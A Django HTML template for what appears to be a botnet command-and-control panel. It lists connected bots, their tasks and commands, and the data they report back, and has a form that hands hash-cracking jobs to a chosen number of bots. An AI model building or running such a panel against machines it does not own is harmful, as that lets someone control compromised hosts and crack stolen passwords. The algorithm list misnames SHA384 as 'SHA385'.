{% extends "base.html" %}
{% load static %}
{% load humanize %}

{% block content %}
<h2>Lista de Bots (conectados en los últimos 10 minutos)</h2>
<br>
<table id="bots-table" class="table table-striped table-bordered text-nowrap" cellspacing="0" width="100%">
  <thead>
    <tr>
      <th>UUID</th>
      <th>OS</th>
      <th>Username</th>
      <th>Last Connection</th>
    </tr>
  </thead>
  <tbody>
  {% for bot in bots %}
    <tr>
      <td>{{ bot.uuid }}</td>
      <td>{{ bot.os }}</td>
      <td>{{ bot.username }}</td>
      <td>{{ bot.last_connection | naturaltime }}</td>
    </tr>
  {% endfor %}
  </tbody>
</table>
<br>
<br>

<h2>Lista de Tareas</h2>
<table id="tasks-table" class="table table-striped table-bordered text-nowrap" cellspacing="0" width="100%">
  <thead>
    <tr>
      <th>Name</th>
      <th>Command</th>
      <th>Total Workers</th>
      <th>Workers Running</th>
      <th>Created at</th>
    </tr>
  </thead>
  <tbody>
  {% for task in tasks %}
    <tr>
      <td>{{ task.name }}</td>
      <td>{{ task.command }}</td>
      <td>{{ task.total_workers }}</td>
      <td>{{ task.workers_running }}</td>
      <td>{{ task.created_at | naturaltime }}</td>
    </tr>
  {% endfor %}
  </tbody>
</table>
<br>
<br>


<h2>Lista de Reportes</h2>
<table id="reports-table" class="table table-striped table-bordered text-nowrap" cellspacing="0" width="100%">
  <thead>
    <tr>
      <th>Task Name</th>
      <th>Bot Username</th>
      <th>Data</th>
      <th>Reported at</th>
    </tr>
  </thead>
  <tbody>
  {% for report in reports %}
    <tr>
      <td>{{ report.task.name }}</td>
      <td>{{ report.bot.username }}</td>
      <td>{{ report.data }}</td>
      <td>{{ report.created_at | naturaltime }}</td>
    </tr>
  {% endfor %}
  </tbody>
</table>
<br>
<br>

<h2>Distribuir Tarea de Cracking</h2>
<form action="{% url 'run_command' %}" method="post">
  {% csrf_token %}
  <div class="form-group">

    <div class="row">

      <div class="col">
        <input type="text" class="form-control" name="name" placeholder="Name (Ex: Cracking Task)">
      </div>
      <div class="col">
        <input type="text" class="form-control" name="url" placeholder="Hashes URL (Ex: http://domain.com/hashlist.txt)">
      </div>

      <div class="w-100"></div>

      <div class="col">
        <select class="form-control" name="hashing-algorithm">
          <option>MD5</option>
          <option>SHA1</option>
          <option>SHA224</option>
          <option>SHA256</option>
          <option>SHA385</option>
          <option>SHA512</option>
        </select>
      </div>
      <div class="col">
        <input type="text" class="form-control" name="charset" placeholder="Character set (Ex: lLds)">
      </div>
      <div class="col">
        <input type="text" class="form-control" name="length" placeholder="Word max length (Ex: 6)">
      </div>
      <div class="col">
        <input type="text" class="form-control" name="bots" placeholder="Bots (Ex: 10)">
      </div>

      <div class="w-100"></div>

      <div class="col">
        <input type="submit" value="Submit" class="btn btn-primary btn-block">
      </div>

    </div>

  </div>
</form>


{% endblock %}
